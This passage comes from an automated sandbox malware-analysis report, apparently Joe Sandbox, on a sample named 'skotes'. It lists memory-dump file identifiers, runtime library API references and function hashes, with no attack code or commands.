                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                          • API String ID: 3897347962-3650809737
                                                                                                                                                                                                                                          • Opcode ID: be0a2f5b50a617ab1285d5f66065733f3db9ae15b7affd625c3aaac77b70c78f
                                                                                                                                                                                                                                          • Instruction ID: 6ae4208d044e5beb3939179582fd945faf8dceb08d4f10458970b24ab8d5e218
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0a2f5b50a617ab1285d5f66065733f3db9ae15b7affd625c3aaac77b70c78f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2212C34A14209AFCF14EFA9C595AADBBF5EF19350F5440F9E905A7361CB30AE01CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00B97903
                                                                                                                                                                                                                                            • Part of subcall function 00B95CB8: __EH_prolog3_catch.LIBCMT ref: 00B95CBF
                                                                                                                                                                                                                                            • Part of subcall function 00B95CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B95CF8
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B9792A
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00B97936
                                                                                                                                                                                                                                            • Part of subcall function 00B95CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00B95D70
                                                                                                                                                                                                                                            • Part of subcall function 00B95CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00B95D7E
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00B97982
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 00B979A3
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00B979AB
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00B979BD
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00B979ED
                                                                                                                                                                                                                                            • Part of subcall function 00B9691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00B96942
                                                                                                                                                                                                                                            • Part of subcall function 00B9691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00B96965
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1475861073-0
                                                                                                                                                                                                                                          • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                          • Instruction ID: e33e680bf96d74a3eacda748967c00a7a38c83805b2c11244ba133516f164304
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0831E130B98255AACF16AA7848927FEBBF5DF41300F1401F9D486E7242DE244D4AC7D1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BA4877
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00BA487F
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BA4908
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00BA4933
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00BA4988
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 65931cac25cefe2ac404cf0df515fa475e2bd43abc4ffabf0424a4dfefd6fd71
                                                                                                                                                                                                                                          • Instruction ID: 1a10da2446aa8a4072c813e91ff1ef4b9a452293217db3bfb1a7cb484053b93e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65931cac25cefe2ac404cf0df515fa475e2bd43abc4ffabf0424a4dfefd6fd71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3641E534A04248AFCF10DF68D884A9FBBF4EF86314F1481D5E8189B3A2D7B5DA15CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00B9DD91
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00B9DDAE
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00B9DE14
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00B9DE29
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00B9DE3B
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 00B9DE4B
                                                                                                                                                                                                                                          • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00B9DE74
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
